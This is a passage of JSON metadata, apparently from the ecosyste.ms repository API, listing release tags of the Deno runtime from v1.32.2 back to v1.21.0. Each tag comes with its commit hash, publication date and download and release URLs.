s/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6",